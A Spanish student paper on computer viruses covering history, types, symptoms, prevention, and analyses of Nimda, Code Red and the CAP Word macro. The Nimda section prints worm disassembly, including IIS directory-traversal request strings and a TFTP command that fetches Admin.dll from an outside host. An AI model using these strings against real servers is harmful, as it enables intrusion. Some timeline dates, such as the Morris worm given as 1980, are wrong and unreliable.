Trabajo
de Teoría - VIRUS - Seguridad y Protección de la información
Índice:
1.
Concepto de virus.
2.
Orígenes.
3.
Tipos de virus.
4.
Síntomas.
5.
Prevención.
6.
Virus en Internet.
7.
Ejemplos de virus: Nimda (correo/red), Código
Rojo (servidor web), CAP (macro de MS Word).
1.Concepto
de virus:
Un
virus es un programa informático o porción de código
que tiene la propiedad de reproducirse a sí mismo y copiarse en
la memoria del computador víctima sin consentimiento del usuario.
Un virus tiene que ser ejecutado para que se active. La forma más
habitual consiste en hacer doble clic sobre el icono del programa (en sistemas
con introducción de comandos por teclado se escribe el nombre del
programa ejecutable y se pulsa enter). Los virus afectan generalmente a
la parte software de un ordenador, aunque se han dado casos de virus que
han afectado al hardware (borrando la BIOS del sistema, o ciertos virus
antiguos que agotaban el fósforo de los monitores monocromo).
Los
virus se pueden difundir con los ejecutables de programas, como macros
incluidos en documentos creados con ciertas aplicaciones (Word, Excel,
...) o como los más modernos, usando la red de redes, Internet,
mediante el correo electrónico o el navegador web (controles ActiveX,
applets Javascript, ...). Las personas y comunidades que desarrollan los
virus tienen como meta la máxima difusión y permanencia del
virus.
Existen
otras formas de reproducción de los virus, como los caballos de
Troya, las bombas lógicas o los gusanos. Un caballo de Troya aparenta
ser algo interesante e inocuo, por ejemplo un juego, pero cuando se ejecuta
puede tener efectos dañinos. Una bomba lógica libera su carga
activa cuando se cumple una condición determinada, como cuando se
alcanza una fecha u hora específicas o cuando se teclea una combinación
de letras. Un gusano se limita a reproducirse, pero puede ocupar memoria
del ordenador y hacer que sus procesos vayan más lentos.
2.Orígenes
de los virus:
1949:
John Von Neumann escribe "Teoría y organización de un autómata
complicado", en el que se apuntan algunos indicios sobre los virus, como
la idea de una porción de código capaz de reproducirse a
si mismo.
1959:
En la AT&T Bell se desarrolla el juego Core Wars (Guerra Nuclear o
Guerra de Núcleos de Ferrita). Dicho juego consistía en una
batalla entre los códigos de dos programadores, creados en un lenguaje
pseudo-ensamblador denominado RedCode, en la que cada jugador desarrollaba
un programa cuyo objetivo era acaparar la mayor cantidad de memoria posible
mediante la reproducción de sí mismo.
1970:
Creeper es difundido por la red ARPANET. Este virus mostraba el mensaje
"SOY CREEPER...ATRAPAME SI PUEDES!". Ese mismo año es creado su
antídoto: el antivirus Reaper, el cual se encargaba de buscar y
destruir al Creeper por la red.
1974:
Aparece el virus Rabbit, el cual hacía una copia de sí mismo
y la colocaba dos veces en la cola de ejecución del ASP de IBM,
lo que causaba un bloqueo del sistema.
1980:
La red ARPANET es infectada por un virus de tipo "gusano" y queda 72 horas
fuera de servicio. La infección fue originada por Robert Tappan
Morris, un joven estudiante de informática de 23 años aunque
según él fue un accidente.
1983:
El juego Core Wars, con adeptos en el MIT, salió a la luz publica
en un discurso de Ken Thompson. A.K. Dewdney explica en uno de sus artículos
el mecanismo de funcionamiento de este juego.
1984:
Aparece el término virus tal como lo entendemos hoy. Fue durante
la conferencia IFIC/SEC'84, cuando el doctor Fred Cohen definió
un virus como "software maligno capaz de reproducirse a si mismo", estableciendo
paralelismos entre los virus biológicos y los virus informáticos
para justificar la adopción de dicha terminología.
1987:
Se da el primer caso de contagio masivo de computadoras a través
del MacMag Virus o Peace Virus sobre computadoras Macintosh. Este virus
fue creado por Richard Brandow y Drew Davison y lo incluyeron en un disco
de juegos que repartieron en una reunión de un club de usuarios.
Uno de los asistentes, Marc Canter, consultor de Aldus Corporation, se
llevó el disco a Chicago y contaminó la computadora en el
que realizaba pruebas con el nuevo software Aldus Freehand. El virus contaminó
el disco maestro en el que se desarrolló el software, con lo que
todas las copias que se crearon del mismo fueron infectadas.
1988:
Aparece la primera versión del virus Viernes 13 (del 13 de Mayo
de 1988) en los ordenadores de la Universidad Hebrea de Jerusalén.
Dicho virus se difundió por la red universitaria y consiguió
infectar los ordenadores del ejército y del Ministerio de Educación.
Además, acabó internacionalizándose e infectando una
gran cantidad de ordenadores por todo el mundo. También surge el
virus Brain creado por los hermanos pakistaníes Basit y Alvi Amjad,
en Estados Unidos.
3.Tipos
de virus:
Los
virus se pueden clasificar en función del lugar donde se alojan,
técnica de replicación o plataforma en la cual trabajan:
1.
De archivo: Infectan archivos. Tradicionalmente los tipos ejecutables
com y exe han sido los más afectados. Normalmente insertan el código
del virus al principio o al final del archivo, manteniendo intacto el código
del programa original infectado. Al ejecutar el programa, el virus puede
hacerse residente en memoria y luego devuelve el control al programa original
para que se continúe de modo normal. Un ejemplo de este tipo de
virus es el Viernes 13. Dentro de la categoría de virus de archivos
podemos encontrar mas subdivisiones, como los siguientes:
1.1
Virus de acción directa: No quedan residentes en memoria ya
que se replican en el momento de ejecutarse un archivo infectado.
1.2
Virus de sobreescritura: Modifican y de paso corrompen el achivo donde
se ubican al sobreescribirlo.
1.3
Virus de compañía: MS-DOS tiene un orden de preferencia
a la hora de ejecutar programas, gracias al cual si llamamos un archivo
para ejecutarlo sin indicar la extensión el sistema operativo buscará
en primer lugar el fichero terminado en .com. Este tipo de virus no modifica
el programa original, sino que cuando encuentra un archivo tipo exe crea
otro de igual nombre conteniendo el virus pero con la extensión
com. De este modo, cuando tecleamos el nombre del programa ejecutamos en
primer lugar el virus, y posteriormente la aplicación original.
En
esta categoría podríamos incluir los virus bat (procesos
por lotes). Este tipo de virus emplea comandos de MS-DOS en archivos de
proceso por lotes para replicarse y provocar efectos dañinos como
cualquier otro tipo virus.
En
ocasiones, los archivos de proceso por lotes o bat se emplean como lanzaderas
para colocar en memoria virus comunes. Para ello se autorreplican como
archivos com y se ejecutan.
2.
De macro: Son virus de reciente creación pero de gran expansión.
Estos estan programados usando el lenguaje de macros WordBasic, gracias
al cual pueden infectar y replicarse a traves de archivos MS-Word (doc).
En la actualidad esta técnica se ha extendido a otras aplicaciones
como Excel y a otros lenguajes de macros, como es el caso de los archivos
sam del procesador de textos de Lotus. Una peculiaridad que hace a estos
virus especialmente peligrosos es que son multiplataforma, es decir, pueden
afectar a cualquier sistema operativo que ejecute el programa que usu dichas
macros. Hoy en día son el tipo de virus que estan teniendo un mayor
auge debido a su facilidad de programación y distibución,
esto último mediante Internet, y aprovechando la aparente falta
de precaución que deberían emplear los usuarios a la hora
de abrir un documento descargado.
3.
De sector de arranque (o Boot): Estos virus se graban en el sector
de arranque del disco, el cual contiene la información organizativa
del disco: número de pistas, sectores, caras, tamaño de la
FAT, sector de comienzo, .... Dicho sector de arranque también contiene
un pequeño programa de arranque que verifica si el disco puede arrancar
el sistema operativo. Los virus de sector de arranque lo utilizan para
ubicarse, duplicando el sector original en otra parte del disco. En muchas
ocasiones el virus marca los sectores donde guarda el sector de arranque
original como defectuosos para impedir así que sean borrados. En
el caso de discos duros pueden utilizar tambien la tabla de particiones
o FAT como ubicación. Suelen quedar residentes en memoria al hacer
cualquier operación en un disco infectado, a la espera de replicarse.
Estos virus se suelen (ahora cada vez menos) propagar mediante la circulación
de disquetes infectados. Un ejemplo de este tipo de virus es el Brain.
4.
Gusano: Este tipo de virus se propaga mediante internet, concretamente
por el lector de correo. Estos virus se transmiten como ficheros adjuntos
a los mensajes de correo electrónico y se activan al abrirlos. Algunos
ejemplos de este tipo de virus son SIRCAM32, I love you, Melissa o Nimda,
que tienen como característica común que en el momento en
el que se activan reenvían el mismo mensaje infectado a las primeras
50 direcciones de la libreta de direcciones de correo de Outlook, Messenger
o similares. La propagación es muy rápida y difícilmente
controlable, ya que pueden llegar a infectar casi en el acto todos los
equipos conectados al primer "contagiado" en una red local.
5.
De MIRC: Consiste en un script para el cliente de IRC Mirc. Cuando
alguien accede a un canal de IRC, donde se encuentre alguna persona infectada,
recibe por DCC un archivo llamado "script.ini".
4.
Síntomas:
-Se
reduce la cantidad de memoria RAM y/o de espacio en el disco duro disponible
para la ejecución de programas de usuario. Esto se debe a que el
virus necesita cierto espacio para ubicarse y poder actuar.
-Determinados
programas que se ejecutaban sin problemas comienzan a fallar o a ejecutarse
de forma extraña, más lentamente, ...
-El
sistema operativo se "cuelga" (cae) con mayor frecuencia.
-Aparecen
programas TRS (terminate and stay resident o residentes), que se ejecutan
y permanecen el la memoria RAM del sistema, nuevos y desconocidos antes
por el usuario.
-Se
incrementan los tiempos de carga de los programas.
-Aparecen
mensajes de errores poco frecuentes.
-Acciones
que antes se realizaban con una cierta velocidad se ralentizan notablemente.
-Determinadas
combinaciones de teclas producen efectos no deseados: pérdida de
datos, ejecución de aplicaciones, etc. También se puede cambiar
la configuración del idioma del teclado por la del país del
creador del virus.
-Aparecen
caracteres extraños o efectos raros en pantalla.
-Aparecen
sectores en mal estado en el disco duro. Esto se debe a que algunos virus
se esconden de este modo en el disco duro, marcando como dañados
los bloques en los que se ocultan.
-Se
modifican las características (tamaño, fecha de creación)
o atributos (lectura, oculto) de ficheros ejecutables. Esto puede deberse,
a veces, a la poca experiencia del creador del virus o a un efecto del
mismo.
5.
Prevención:
Existe
una serie de medidas que pueden evitar el contagio de un sistema por un
virus:
-Crear
regularmente copias de seguridad de nuestros datos en CDs, disquetes, cintas
magnéticas u otros soportes previamente verificados.
-Instalar
un programa antivirus para comprobar los archivos que recibimos en disquetes,
CDs o por correo electrónico. Es conveniente actualizar periódicamente
la base de virus del antivirus para evitar ser afectados por los últimos.
Cada día surgen nuevos y complejos virus que hacen imprescindible
una actualización cada cierto tiempo.
-Es
conveniente evitar los ficheros adjuntos al correo, sobre todo cuando son
ficheros extraños o desconocidos. Muchas veces estos ficheros los
enviará un amigo nuestro, pero el mensaje estará en inglés,
o será confuso.
-Para
evitar la propagación (que no el contagio) de virus de tipo gusano
como el SIRCAM o Nimda una solución bastante simple es crear un
contacto en la libreta de direcciones de MS Outlook llamado 00000 000 000,
con dirección de correo 000@000.000. Esto sirve para que cada vez
que uno de estos virus se intente propagar por nuestro lector de correo
provoque un error de envío, ya que nunca se podrá enviar
un mensaje a la primera dirección, y así podremos saber de
paso si estamos infectados.
-Configurar
Windows para que muestre las extensiones de los ficheros (Herramientas
> Opciones de carpeta > Ver > Desmarcaremos la opción Ocultar las
extensiones para tipos de archivo conocido). Con esto sabremos si se trata
de un fichero .doc de Word, si es uno de texto .txt o si se trata de un
programa .exe, .com. Las extensiones .vbx, .pif o .shs son las que más
probabilidades tienen de ser un virus. De este modo también podremos
localizar fácilmente los ficheros con doble extensión (Fichero.doc.exe),
posibles virus.
-Borrar
los correos publicitarios no esperados (el llamado spam) directamente,
especialmente aquellos que incluyan ficheros adjuntos. También todos
aquellos con contenido sexual (sex.exe).
-Evitar
abrir, del mismo modo, los archivos adjuntos en chats, foros o grupos de
noticias, a no ser que conozcamos a la persona que nos lo envía.
-Emplear,
en la medida de lo posible, sistemas de correo de tipo webmail (pasarelas
web de correo), como Hotmail, Yahoomail, o la pasarela de la UJI webmail.uji.es,
ya que estos sistemas suelen pasar programas antivirus a todos los ficheros
adjuntos, y evidentemente controlan la actualización con las últimas
versiones.
-Deshabilitar
la ejecución de macros en Word y Excel para aquellos ficheros de
dudoso origen.
6.Virus
en Internet:
Los
virus en internet pueden propagarse de diversas formas:
-Descarga/Ejecución
de programas/documentos desde web, ftp: Esta forma puede equivaler a la
manera en que se propagaban los virus en la época de MS-DOS, es
decir, mediante la circulación de disquetes infectados, con la diferencia
de que en este caso el espectro de posibles víctimas es bastante
mayor. De todas formas, por descargar un fichero no se puede infectar un
equipo, lógicamente, aunque lo facilita bastante. Para evitarlo
se debe evitar la ejecución de todo ejecutable (.exe, .com) sospechoso.
-Lectura
de un documento adjunto en un correo: Este método afecta principalmente
a los usuarios de MS Outlook, debido a los agujeros de seguridad del mismo.
Al abrir un fichero adjunto infectado, este ejecuta un código en
Javascript, ASP, Visual Basic, etc que provoca tanto la propagación
usando nuestra libreta de direcciones como la "instalación" del
código maligno que genera (normalmente) daños a los datos
del equipo afectado. Los mensajes con un asunto del estilo "Carta de amor"/"Love
letter" o "Aquí te mando esto para que me des tu punto de vista"
suelen contener virus de tipo gusano (ILOVEYOU, SIRCAM, etc.), por lo que
hay que evitar abrir sus adjuntos, pese a que procedan de un remitente
conocido. Hay que tener en cuenta que las únicas formas de infectarse
abriendo un email son si el cliente de correo electrónico utilizado
realiza alguna de las siguientes acciones:
-Abrir
automáticamente los attachs recibidos.
-Interpretar
los attachs en formato de página web (.htm, .html).
Existe
una excepción a esta regla, y es cuando existen agujeros de seguridad
en los clientes de correo electrónico, como en el caso del virus
BubbleBoy, que se aprovecha de un error de seguridad en Outlook, para que,
con sólo abrir un mensaje con ese virus, el PC se infecte.
Para
enviar los virus en forma masiva, dentro de archivos anexados, a través
de la Libreta de Direcciones de MS Outlook, Outlook Express o MS Exchange,
estas especies virales toman control de las librerías MAPI (Messaging
Application Programming Interface), que son un conjunto de funciones C
estándar, definidas en código DLL (Dynamic Link Library).
Estas funciones fueron originalmente creadas por Microsoft para Microsoft
Mail, pero han recibido agregados y mejoras por parte de terceros: MAPI.DLL
y MAPI32DLL.
Las
librerías MAPI están disponibles para los desarrolladores
de la mayoría de lenguajes Visual. De allí proviene la facilidad
para la creación de virus que afectan o toman control de estas librerías
para el re-envío de mensajes.
Para
que los virus contenidos en archivos anexados se difundan con mayores posibilidades,
también pueden infectar la librería WSOCK32.DLL, que intercepta
las funciones de MS Windows que establecen las conexiones de red, incluyendo
las funciones de Internet. Las especies virales de que usan esta librería
tienen mayor capacidad de causar estragos, ya que afectarán a casi
todas las funciones y/o servicios de Internet: HTTP, IRC, FTP, TelNet,
etc.
Con
el objeto de despertar la curiosidad innata del ser humano, los autores
de esta modalidad de propagación de virus emplean argumentos en
el cuerpo del mensaje, tales como: "Buenas nuevas", "Gane dinero", "Te
adjunto una información muy interesante que te va a convenir", incluyen
gráficos anexados atractivos, etc.
Los
virus pueden estar contenidos en documentos .DOC, archivos comprimidos
en formato .ZIP, ejecutables .EXE, en controles ActiveX de archivos HTML,
Visual Basic Scripts, archivos con extensión .SHS, .HTA, .PIF y
últimamente en archivos con doble extensión, por lo general
una de ellas con atributo "oculto" (hidden).
Si
estos virus contienen instrucciones de auto-enviarse a la Libreta de Direcciones
del software de correo del usuario, haciendo uso de las librerías
MAPI su propagación tendrá un efecto multiplicador, que además
de los daños contenidos en su payload, saturarán muchos de
los servidores de los Proveedores de Servicios de Internet (ISP).
El
gusano Sircam emplea sus propias rutinas SMTP (Simple Mail Transfer Protocol)
y MIME (Multipurpose Internet Mail Extension), para simular un mensaje
y auto-enviarse a todos los buzones de correo de la Libreta de Direcciones
de Windows, así como a las direcciones encontradas en el directorio
de Archivos Temporales de Internet.
Magistri.b,
infecta todos los sistemas operativos de 32 bits de Microsoft: Windows
95/98/NT/Me/2000 y se autoenvía a la libreta de direcciones de Windows,
Outlook Express, Netscape Messenger y Eudora Mail.
El
virus Melissa, difundido en Marzo de 1999, así como el virus Papa
fueron las primeras muestras de esta modalidad de difusión y en
el 2000 el ExploreZip, el LoveLetter y el VBS/Stages, MTX, Prolin, Hybris,
Creative, etc., fueron causantes de serios daños en cientos de miles
de sistemas en todo el mundo.
-Accediendo
a una página web con scripts peligrosos: Para modificar el aspecto
de determinadas páginas web o dotarlas de servicios especiales (comercio
electrónico, formularios, animaciones, etc.) se suelen incluir scripts.
Estos scripts son pequeños programas codificados en Javascript,
ASP, Perl y demás (o controles ActiveX de Microsoft) que pueden
resultar peligrosos para el cliente que recibe las páginas, aunque
normalmente las capacidades de actuación de dichos scripts en el
equipo remoto son algo limitadas. Para evitar esto se puede deshabilitar
la ejecución por defecto de la consola Java en navegadores como
Explorer (la versión 6 la desactiva por defecto) o deshabilitar
la aceptación de páginas con contenido ActiveX.
7.Ejemplos
de virus:
-Nimda:
este virus se propaga siempre en sitemas con Windows por tres vías
diferentes: por correo electrónico, al visitar una página
Web o al estar en una red local compartiendo recursos con otro ordenador
infectado. Además, tiene una cuarta vía de infección
que afecta a los servidores Windows basados en Internet Information Server:
a)
Por correo electrónico: Nimda se autoenvía en un mensaje
de correo electrónico con el archivo "readme.exe" adjunto. Utiliza
un formato HTML para explotar una conocida vulnerabilidad de Internet Explorer,
heredada por Outlook y Outlook Express, de forma que puede ejecutar README.EXE
sin necesidad de que el usuario lo abra, basta con previsualizar el mensaje
en el cliente de correo.
Para
lograrlo modifica la cabecera MIME que hace referencia a README.EXE indicando
que se trata de un archivo tipo audio/x-wav. De esta forma engaña
a Internet Explorer, que lo abre de manera automática creyendo que
se trata de un formato inofensivo, un simple archivo de sonido. El resultado
es el mismo al previsualizar el mensaje en Outlook y Outlook Express, ya
que los clientes de correo de Microsoft utilizan los módulos de
Internet Explorer para interpretar HTML.
-
---
db
'Content-Type: audio/x-wav;',0Dh,0Ah
db
9,'name="readme.exe"',0Dh,0Ah
db
'Content-Transfer-Encoding: base64',0Dh,0Ah
-
---
b)
Infección al visualizar una página Web de un servidor infectado:
La página infectada contiene un código JavaScript que intenta
abrir el archivo readme.eml (.eml es la extensión de mensaje de
correo electrónico) para después infectar del mismo modo
que por correo electrónico.
c)
En la red local: Una vez que logra infectar un sistema, Nimda recorre
todas las unidades locales y de red e infecta todos los directorios a los
que tiene acceso. Para conseguir propagarse, por un lado crea múltiples
archivos de mensajes de correo electrónico infectados con nombres
aleatorios y extensiones .eml o .nws. Estos mensajes contienen el mismo
código empleado para el contagio por web y correo, por lo que sus
efectos son idénticos.
Además
busca en todas las unidades locales ficheros con las cadenas default, index,
main o readme y extensión .html, .htm o .asp para insertar el código
javascript del apartado b). De esta forma cualquier equipo que acceda a
algún documento de ese tipo en el equipo infectado o a algún
ejecutable queda infectado. Y si se tiene el directorio raíz (C:\)
compartido, el virus puede acceder a la carpeta Inicio de Windows para
provocar su ejecución al arrancar el sistema.También infecta
ejecutables anteponiendo su código:
-
---
push
offset default ; "default"
push
eax
call
ebp ; strstr
pop
ecx
test
eax, eax
pop
ecx
jnz
short loc_36173585
lea
eax, [esp+160h+var_120]
push
offset index ; "index"
-
---
d)
Infección de un servidor Web Internet Information Server: este
virus intenta introducirse de forma automática en este tipo de servidores
Web por medio de varios agujeros de seguridad a través de peticiones
GET vía HTTP, bien buscando tener acceso al intérprete de
comandos, CMD.EXE, o al archivo ROOT.EXE, un troyano introducido previamente
al ser infectado por los gusanos Code Red II o Sadmind.
-
---
mov
dword ptr [ebp-48h], offset scripts_dir ; "/scripts"
mov
dword ptr [ebp-44h], offset MSADC_dir ; "/MSADC"
mov
dword ptr [ebp-40h], offset aC_0 ; "/c"
mov
dword ptr [ebp-3Ch], offset aD ; "/d"
mov
dword ptr [ebp-38h], offset esc_char1 ; "/scripts/..%255c.."
mov
dword ptr [ebp-34h], offset esc_char2 ; "/ _vti_bin/..%255c../..%255c../..%255c.."
mov
dword ptr [ebp-30h], offset esc_char3 ; "/ _mem_bin/..%255c../..%255c../..%255c.."
mov
dword ptr [ebp-2Ch], offset esc_char4 ; "/msadc/..%255c../..%255c../..%255c/..%c"...
mov
dword ptr [ebp-28h], offset unicode_1 ; "/scripts/..%c1%1c.."
mov
dword ptr [ebp-24h], offset unicode_2 ; "/scripts/..%c0%2f.."
mov
dword ptr [ebp-20h], offset unicode_3 ; "/scripts/..%c0%af.."
mov
dword ptr [ebp-1Ch], offset unicode_4 ; "/scripts/..%c1%9c.."
mov
dword ptr [ebp-18h], offset aScripts__3563_ ; " / scripts/..%%35%63.."
mov
dword ptr [ebp-14h], offset aScripts__35c__ ; " / scripts/..%%35c.."
mov
dword ptr [ebp-10h], offset aScripts__25356 ; " / scripts/..%25%35%63.."
mov
dword ptr [ebp-0Ch], offset aScripts__252f_ ; "/ scripts/..%252f.."
-
---
Si el
servidor es vulnerable a algunos de los ataques que Nimda lleva a cabo,
aprovecha para ejecutar una sesión de TFTP y así descarga
en el servidor Web el archivo ADMIN.DLL, que contiene el código
vírico. Este archivo se copiará en las unidades C:, D: y
E:
- ---
TFTP_GET
db 'tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20',0
-
---
Más
información sobre este virus, aquí.
-Consejos
para evitar el virus Nimda: Actualizar el navegador web de Microsoft
a la versión 6, ya que las versiones vulnerables son Internet Explorer
5.01 y 5.5 que no tengan instalado el Service Pack 2 o la actualización
específica que Microsoft distribuyó para este problema. Esto
no evitará el contagio al abrir un archivo adjunto.
Para evitar
la infección en servidores web debemos actualizar el mismo a su
última versión, además de borrar todo rastro del Code
Red, pues Nimda intenta acceder a él para lograr la infección.
-Red
Code o Código Rojo: Este virus infecta servidores web utilizando
la vulnerabilidad .IDA. Este gusano infectó en sus tres primeros
días de actividad más de cinco mil servidores. Para atacar
los servidores utiliza el desbordamiento de búfer existente en el
filtro ISAPI de Microsoft Indexing Service. Esta vulnerabilidad permite
a un atacante remoto ejecutar código arbitrario en el servidor con
privilegios de SYSTEM, lo que le facilita un control absoluto de la máquina.
El
funcionamiento del Código Rojo es el que sigue:
1)
Una vez infectada la máquina, arranca 100 hilos de ejecución
o threads que se emplean para buscar otros servidores web vulnerables e
infectarlos con el gusano (salvo si existe un archivo denominado C:\NOTWORM,
en cuyo caso la propagación se anula). El gusano utiliza un algoritmo
semi-aleatorio para determinar las direcciones IP a analizar. Este sistema
hace que la secuencia de direcciones IP analizadas sea la misma en todos
los servidores infectados. De este modo, a medida que el número
de máquinas infectadas aumenta, las primeras direcciones analizadas
se ven desbordadas con una gran cantidad de tráfico, lo que puede
provocar un ataque de denegación de servicio (DOS). Además,
el gusano tiene la capacidad de infectar varias veces la misma máquina
(según parece hasta 3), lo que puede provocar el agotamiento de
los recursos (el equipo se "cuelga").
2)
Modifica las páginas web existentes con el siguiente código:
Hace
poco ha hecho su aparición una variante de este virus: el Código
Azul. El nuevo virus se ha detectado en China, país donde al parecer
se originó su hermano. Código azul ralentiza progresivamente
las operaciones de los equipos informáticos hasta bloquearlos por
completo. Esta familia de virus también cuenta con una segunda versión
de Código Rojo que no solo ataca los sistemas sino que deja tras
de sí vulnerabilidades aprovechables por los hackers.
-Consejos
para evitar el virus Código Rojo: Para solucionar esta vulnerabilidad
Microsoft publicó un boletín (MS01-33) y un parche que se
debe instalar.
-CAP
(macro de MS Word): Este virus es de origen venezolano, y se informó
por primera vez de una infección por el mismo en Febrero de 1997.
Este virus emplea macros vacías para evitar que Word muestre opciones
de Menú. El virus también quita las opciones de menú
Macros... y Personalizar... Además Winword/CAP (como también
se le conoce) desconecta la petición para Salvar el fichero NORMAL.DOT.
Cuando infecta Word, CAP modifica cinco menús existentes, redireccionándolos
al código del virus. Esto causa algunos problemas, como los nombres
de las opciones modificadas son diferentes en diferentes instalaciones
de Word y en versiones de Word en diferentes idiomas.
Otro
efecto de CAP es que todos los documentos son salvados en formato DOC de
Word, sin tener en cuenta el que se elija. Así, por ejemplo, si
un documento es salvado como un fichero RTF, la extensión del fichero
será RTF pero internamente es aún un fichero DOC y aún
contiene el virus. Los ficheros RTF no contienen macros y no pueden extender
los virus de macro. Cuando CAP infecta documentos, borra todas las macros
existentes en ellos. De otro modo CAP no hace nada destructivo. Sin embargo,
quita las opciones de menú Herramientas/Macros y Herramientas/Personalizar
y desconecta la opción de menú Archivo/Plantillas para protegerse.
(si permitiese entrar en la opción Herramientas/Macros, se podría
borrar o modificar este virus-macro.
Los
antivirus desinfectan normalmente los ficheros borrando todas las macros
del fichero (no hay modo de restaurar las macros originales que fueron
borradas por el virus). Se pueden restaurar las macros de NORMAL.DOT en
caso que la copia de seguridad esté limpia 100%.
CAP
instala las 10 macros siguientes:
CAP
- rutina de infección
AutoExec
- llama a la rutina de infección.
AutoOpen
- - // -
FileOpen
- - // -
FileSave
- - // -
AutoClose
- - // -
FileClose
- - // -
FileSaveAs
- - // -
ToolsMacro
- oculta todas las macros (rutina "stealth")
FileTemplates
- - // -
Además,
el virus averiguará la versión actual de idioma se instalará
también como en inglés. Por ejemplo, si el virus infecta
la versión en Alemán de Word, también instalá
las macros llamadas DateiÖffnen, DateiSpeichern, DateiSpeichernUnter,
DateiSchließenOderAllesSchließen.
Finalmente,
este virus contiene como comentario la cadena:
C.A.P:
Un virus social.. y ahora digital.
"j4cKy
Qw3rTy" (jqw3rty@hotmail.com).
Venezuela,
Maracay, Dic 1996.
P.D.
Que haces gochito ? Nunca seras Simon Bolivar.. Bolsa !
-Consejos
para evitar el virus CAP: Si se usa Word 95a y Word 97, estos incluyen
una protección anti virus de macro que se activa como sigue:
a.
Seleccionar en el menú, Herramientas/Opciones.
b.
Activar la pestaña General.
c.
Marcar la opción Protección antivirus en macros.
La
mayoría de los virus macros infectan el sistema instaládose
en la platilla NORMAL.DOT. Word 6.0 o Word 95 puede proteger contra escritura
este fichero con el comando de MS-DOS: attrib +r c:\winword\plantill\normal.dot
Si
se usa Word 97, se pueden prevenir cambios no autorizados de esta plantilla:
a.
En el menú Herramientas, escoger Macro/Editor Visual Basic.
b.
En el menú del Editor seleccionar Ver/El Explorador de Proyectos.
c.
En la ventana del Explorador de Proyectos, activar la opción Normal,
y con el botón derecho de ratón elegir ver sus Propiedades.
d.
Seleccionar la pestaña de Protección y seleccione Bloquear
proyecto para visualización.
e.
Escribir una Contraseña y confirmarla reescribiéndola.
Francisco
Javier Herrera Pérez